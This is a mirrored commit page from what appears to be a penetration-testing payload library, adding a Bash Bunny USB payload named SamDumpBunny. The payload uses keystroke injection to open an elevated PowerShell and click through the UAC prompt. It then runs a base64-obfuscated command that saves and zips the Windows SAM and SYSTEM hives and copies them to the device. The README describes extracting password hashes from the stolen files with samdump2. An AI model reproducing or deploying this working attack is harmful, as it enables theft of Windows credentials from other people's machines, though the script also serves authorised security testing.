mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Uploaded SamDumpBunny
Dumps users sam & system hive, which can be used later to extract the users hashes
This commit is contained in:
0iphor13
21
payloads/library/credentials/SamDumpBunny/README.md
Normal file
21
payloads/library/credentials/SamDumpBunny/README.md
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
**Title: SamDumpBunny**
|
||||||
|
|
||||||
|
<p>Author: 0iphor13<br>
|
||||||
|
OS: Windows<br>
|
||||||
|
Version: 1.0<br>
|
||||||
|
|
||||||
|
**What is SamDumpBunny?**
|
||||||
|
#
|
||||||
|
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
|
||||||
|
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
||||||
|
|
||||||
|
|
||||||
|
**Instruction:**
|
||||||
|
1. Plug in your Bashbunny and wait a few seconds
|
||||||
|
|
||||||
|
2. Unzip the exfiltrated zip file onto your machine.
|
||||||
|
|
||||||
|
3. Use a tool like samdump2 on your machine to extract the users hashes.
|
||||||
|
> `samdump2 BunnySys BunnySam`
|
||||||
|
|
||||||
|
|
||||||
53
payloads/library/credentials/SamDumpBunny/payload.txt
Normal file
53
payloads/library/credentials/SamDumpBunny/payload.txt
Normal file
@@ -0,0 +1,53 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: SamDumpBunny
|
||||||
|
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||||
|
# Author: 0iphor13
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Credentials
|
||||||
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
DUCKY_LANG de
|
||||||
|
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||||
|
|
||||||
|
LED STAGE1
|
||||||
|
|
||||||
|
Q DELAY 1000
|
||||||
|
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
|
||||||
|
Q ALT j
|
||||||
|
Q DELAY 250
|
||||||
|
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||||
|
Q DELAY 300
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
Reference in New Issue
Block a user